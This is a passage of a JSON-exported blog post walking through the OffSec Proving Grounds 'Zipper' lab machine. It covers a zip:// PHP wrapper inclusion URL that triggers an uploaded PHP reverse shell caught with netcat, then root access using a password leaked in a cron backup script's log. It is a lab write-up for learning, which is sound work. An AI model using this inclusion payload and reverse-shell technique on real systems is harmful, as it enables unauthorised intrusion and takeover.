class=\"line\"><span style=\"color: #89DDFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">?&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">The Foothold<\/h3>\n\n\n\n<p>Further research into PHP wrappers reveals an interesting zip wrapper. Use of it will access a zip file in the archives. This could trigger a malicious file, let&#8217;s say a PHP reverse shell. We can be fairly certain it will execute due to the existence of PHP already running on the machine.<\/p>\n\n\n\n<p>First we must get the zipped file onto the machine. Let&#8217;s play with the zip function on the Zipper site. A handful of test files were created and will be loaded into Zipper.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"707\" height=\"149\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-78.png\" alt=\"\" class=\"wp-image-370\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-78.png 707w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-78-300x63.png 300w\" sizes=\"auto, (max-width: 707px) 100vw, 707px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"207\" height=\"114\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-79.png\" alt=\"\" class=\"wp-image-371\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"789\" height=\"171\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80.png\" alt=\"\" class=\"wp-image-372\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80.png 789w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80-300x65.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-80-768x166.png 768w\" sizes=\"auto, (max-width: 789px) 100vw, 789px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image 
size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"770\" height=\"147\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81.png\" alt=\"\" class=\"wp-image-373\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81.png 770w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81-300x57.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-81-768x147.png 768w\" sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"539\" height=\"69\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-82.png\" alt=\"\" class=\"wp-image-374\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-82.png 539w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-82-300x38.png 300w\" sizes=\"auto, (max-width: 539px) 100vw, 539px\" \/><\/figure>\n\n\n\n<p>So, load the file(s) in. Zip them. Click the download link to retrieve the zipped file. Note: the download function conveniently shows us the name of the zip file on the server (we&#8217;ll need that later).<\/p>\n\n\n\n<p>Now, craft the PHP reverse shell. I like to use <a href=\"https:\/\/www.revshells.com\/\" target=\"_blank\" rel=\"noopener\" title=\"\">RevShells.com<\/a>. The &#8220;PHP PentestMonkey&#8221; variant should work well. Copy the output and paste it into a file. I called my file <code>revshell.php<\/code> (this will be needed later). 
Feed it into Zipper as above, being sure to download in order to get the zipped file name.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"531\" height=\"69\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-83.png\" alt=\"\" class=\"wp-image-375\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-83.png 531w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-83-300x39.png 300w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/figure>\n\n\n\n<p>Start your netcat listener on the port specified when creating your <code>php reverse shell<\/code>.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"598\" height=\"133\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-84.png\" alt=\"\" class=\"wp-image-376\" style=\"width:598px;height:auto\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-84.png 598w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-84-300x67.png 300w\" sizes=\"auto, (max-width: 598px) 100vw, 598px\" \/><\/figure>\n\n\n\n<p>Now it&#8217;s time to place the <code>zip php wrapper<\/code> into the address bar on the browser. 
Below is the wrapper with some explanation underneath.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"http:\/\/zipper.offsec\/index.php?file=zip:\/\/uploads\/upload_1718928576.zip%23revshell\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">http:\/\/zipper.offsec\/index.php?file=zip:\/\/uploads\/upload_1718928576.zip%23revshell<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>file=zip<\/code> &#8211;&gt; activates the zip wrapper<\/li>\n\n\n\n<li><code>\/\/uploads\/upload_1718928576.zip<\/code> &#8211;&gt; the uploads directory and the zip filename containing the malicious payload<\/li>\n\n\n\n<li><code>%23revshell<\/code> &#8211;&gt; the URL-encoded # (%23) followed by the name we gave our file, without the <code>.php<\/code> extension, since <code>index.php<\/code> appends <code>.php<\/code> itself. 
Since many files can be in a zipped archive (ie test-alpha.txt, test-bravo.txt, etc) this instructs which specific file to access.<\/li>\n<\/ul>\n\n\n\n<p>Execute and check the listener for success.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"787\" height=\"374\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85.png\" alt=\"\" class=\"wp-image-377\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85.png 787w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85-300x143.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-85-768x365.png 768w\" sizes=\"auto, (max-width: 787px) 100vw, 787px\" \/><\/figure>\n\n\n\n<p>The <code>local.txt<\/code> flag is located in <code>\/var\/www<\/code>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Privilege Escalation<\/h3>\n\n\n\n<p>While enumerating with various commands, something interesting was found while checking cron jobs. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/etc\/crontab<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"346\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86.png\" alt=\"\" class=\"wp-image-379\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86.png 800w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86-300x130.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-86-768x332.png 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<p>The file <code>\/opt\/backup.sh<\/code> looks interesting due to the 5 * (asterisks\/splats) indicating this file is run automatically every minute. Changing directories (cd) into <code>\/opt\/<\/code> and listing all (ls -la) the contents of the directory shows the permissions of <code>backup.sh<\/code>. 
The contents of <code>backup.sh<\/code> are then printed to the screen (cat).<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"672\" height=\"351\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-88.png\" alt=\"\" class=\"wp-image-381\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-88.png 672w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-88-300x157.png 300w\" sizes=\"auto, (max-width: 672px) 100vw, 672px\" \/><\/figure>\n\n\n\n<p>Unfortunately, only the file&#8217;s owner (<code>root<\/code>) has permission to alter the file. So, we are unable to manipulate it in a malicious manner. Let&#8217;s examine the contents of <code>backup.sh<\/code> to determine what it is doing.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"#!\/bin\/bash\npassword=`cat \/root\/secret`\ncd \/var\/www\/html\/uploads\nrm *.tmp\n7za a \/opt\/backups\/backup.zip -p$password -tzip *.zip &gt; \/opt\/backups\/backup.log\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #545454; font-style: italic\">#!\/bin\/bash<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">password<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #89DDFF\">`<\/span><span style=\"color: #FFCB6B\">cat<\/span><span style=\"color: #C3E88D\"> \/root\/secret<\/span><span style=\"color: #89DDFF\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">cd<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">\/var\/www\/html\/uploads<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rm<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #EEFFFF\">*<\/span><span style=\"color: #C3E88D\">.tmp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">7za<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">a<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">\/opt\/backups\/backup.zip<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #EEFFFF\">$password<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">-tzip<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #EEFFFF\">*<\/span><span style=\"color: #C3E88D\">.zip<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">\/opt\/backups\/backup.log<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>password=`cat \/root\/secret`<\/code> &#8211;&gt; a variable named &#8220;password&#8221; is declared, and its value is read from <code>\/root\/secret<\/code><\/li>\n\n\n\n<li><code>cd \/var\/www\/html\/uploads<\/code> 
&#8211;&gt; change directories into the &#8220;uploads&#8221; directory for the Zipper website.<\/li>\n\n\n\n<li><code>rm *.tmp<\/code> &#8211;&gt; remove any file with a <code>.tmp<\/code> extension<\/li>\n\n\n\n<li><code>7za a \/opt\/backups\/backup.zip -p$password -tzip *.zip &gt; \/opt\/backups\/backup.log<\/code> &#8211;&gt; Use 7-Zip (7za) to add (a) every <code>.zip<\/code> file in the directory to the archive <code>\/opt\/backups\/backup.zip<\/code>. The archive is protected with the <code>password<\/code> that was declared (\/root\/secret), and the program&#8217;s output is written to <code>\/opt\/backups\/backup.log<\/code><\/li>\n<\/ul>\n\n\n\n<p>So, that password would be good to acquire. Let&#8217;s check out the <code>backup.log<\/code> file to see if we can view anything useful.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro cbp-blur-enabled\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;--cbp-line-number-width:calc(2 * 0.6 * .875rem);--cbp-line-highlight-color:rgba(238, 255, 255, 0.2);line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7371 16-Core Processor                 (800F12),ASM,AES-NI)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Open archive: \/opt\/backups\/backup.zip<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">--<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Path = \/opt\/backups\/backup.zip<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Type = zip<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Physical Size = 1779<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Scanning the drive:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">3 files, 1327 bytes (2 KiB)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Updating archive: \/opt\/backups\/backup.zip<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Items to compress: 3<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Files read from disk: 3<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Archive size: 1779 bytes (2 KiB)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Scan WARNINGS for files and folders:<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line cbp-line-highlight cbp-no-blur\"><span style=\"color: #EEFFFF\">WildCardsGoingWild : No more files<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">----------------<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Scan WARNINGS: 1<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>What looks like a password is discovered in the file: <code>WildCardsGoingWild<\/code>. 7za lists it under &#8220;Scan WARNINGS&#8221; as a path it could not find, meaning the script handed the secret to 7za as a file-name argument rather than purely as the <code>-p<\/code> value, and the unfiltered output landed in a log the web user can read. The only potential login point we discovered was the <code>OpenSSH<\/code> service we found in the NMAP scan. 
No other usernames were discovered, so let&#8217;s try to log in as <code>root<\/code>.<\/p>\n\n\n\n<p>Success!<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"392\" height=\"178\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-89.png\" alt=\"\" class=\"wp-image-382\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-89.png 392w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-89-300x136.png 300w\" sizes=\"auto, (max-width: 392px) 100vw, 392px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">The Debriefing<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">What went right?<\/h3>\n\n\n\n<p>Although this machine was rated &#8220;Hard&#8221;, I didn&#8217;t find it to be terribly difficult. Maybe I got lucky and it interested me in a particular way and my researching panned out. I rarely felt like I was in the &#8220;Rabbit Hole of Despair&#8221; that I can sometimes fall into when attacking these machines.<\/p>\n\n\n\n<p>Report writing is getting faster and I feel more efficient. I am getting more used to the tools and workflow of creating this content. I am also getting an eye for what looks good for presentation purposes.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">What went wrong?<\/h3>\n\n\n\n<p>Escalating privilege did take me quite a while. When I finally figured it out, I was a bit mad at myself for not seeing it earlier. I need to get more familiar with priv esc and develop more customized techniques for getting there faster with less wasted time\/energy.<\/p>\n\n\n\n<p>I am also experiencing some self-doubt on how much to include in the reporting. I want to thoroughly explain and understand what I am doing with the attacks, yet do not want to be excessively verbose. 
I am my audience, yet I am aware that others will be consuming this.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Lessons Learned<\/h3>\n\n\n\n<p>The skill level with creating the write-ups should increase with experience. I am constantly reminding myself: Progress, not Perfection.<\/p>\n\n\n\n<p>My notes were better on this one. This reminds me even more to continue with good note-taking in the moment. While attacking a box, I&#8217;m thinking it might be a good tactic to go back and re-exploit everything a second time with the intent of creating more solid notes. I have done that before and feel I should make it common practice.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Summary Platform Site OffSec Proving Grounds (Practice) Hostname zipper Domain zipper.offsec Operating System \/ Architecture Linux Rating Hard This write-up is for the machine Zipper on the OffSec Proving Grounds (Practice) labs. I will show how to use PHP wrappers and take the machine all the way through Privilege Escalation. 
The Attack Scanning &amp; Prelims NMAP [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-356","post","type-post","status-publish","format-standard","hentry","category-vuln-machines"],"_links":{"self":[{"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts\/356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=356"}],"version-history":[{"count":9,"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts\/356\/revisions"}],"predecessor-version":[{"id":417,"href":"https:\/\/bencron.com\/index.php?rest_route=\/wp\/v2\/posts\/356\/revisions\/417"}],"wp:attachment":[{"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bencron.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}